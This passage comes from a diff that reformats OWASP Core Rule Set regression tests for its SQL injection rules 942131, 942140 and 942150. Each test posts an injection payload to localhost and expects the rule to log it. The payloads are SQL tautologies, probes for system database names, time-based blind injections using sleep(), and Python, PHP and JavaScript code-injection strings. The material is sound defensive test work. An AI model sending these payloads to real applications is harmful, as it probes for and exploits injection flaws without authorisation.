text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "a='1' not regexp '2'" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a='1' not regexp '2'" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_id: 7 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "a='1' not regexp '1'" - version: HTTP/1.1 - output: - no_log_contains: id "942131" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a='1' not regexp '1'" + version: HTTP/1.1 + output: + no_log_contains: id "942131" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml index e05f3f23c..d839c8ee4 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml 
@@ -2,294 +2,275 @@ meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" description: None - enabled: true - name: 942140.yaml tests: - - test_title: 942140-1 + - test_id: 1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?sql_table=pg_catalog" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?sql_table=pg_catalog" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "INFORMATION_SCHEMA" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "INFORMATION_SCHEMA" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "database(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "database(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "db_name(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "db_name(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "DaTaBasE(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
method: POST + port: 80 + uri: "/post" + data: "DaTaBasE(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "InFoRmaTioN_ScHemA" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "InFoRmaTioN_ScHemA" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "DB_NAME(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "DB_NAME(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - 
uri: "/post" - data: "tempdb" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "tempdb" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "msdb" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "msdb" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 10 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "mysql.db" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "mysql.db" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 11 desc: "SQL 
Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "MSysAccessObjects" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "MSysAccessObjects" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 12 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Northwind" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Northwind" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 13 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "northwind" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-14 + - input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "northwind" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 14 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SCHEMA_NAME" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SCHEMA_NAME" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 15 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "DATABASE(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "DATABASE(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 16 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: 
localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "schema_name" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "schema_name" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 17 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "information_schema" - version: HTTP/1.0 - output: - log_contains: id "942140" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "information_schema" + version: HTTP/1.0 + output: + log_contains: id "942140" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml index c13060656..82e83cec0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml 
@@ -2,328 +2,308 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942150.yaml +rule_id: 942150 tests: - - test_title: 942150-1 + - test_id: 1 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1' and sleep(9) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1' and sleep(9) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1(select*from(select(sleep(5)))d)" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1(select*from(select(sleep(5)))d)" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 4 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test')and (select*from(select(sleep(10)))d)--" - version: 
HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test')and (select*from(select(sleep(10)))d)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 6 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=config.ini' and sleep(91) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=config.ini' and sleep(91) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 7 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=None')and (select*from(select(sleep(10)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=None')and (select*from(select(sleep(10)))a)--" + 
version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 8 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 9 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=file:/init.ini'.sleep(12).'" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=file:/init.ini'.sleep(12).'" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 10 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 11 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 12 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 13 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test{${sleep(12)}}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test{${sleep(12)}}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 14 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 15 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 16 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\foobar.txt\" or sleep(4) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\foobar.txt\" or 
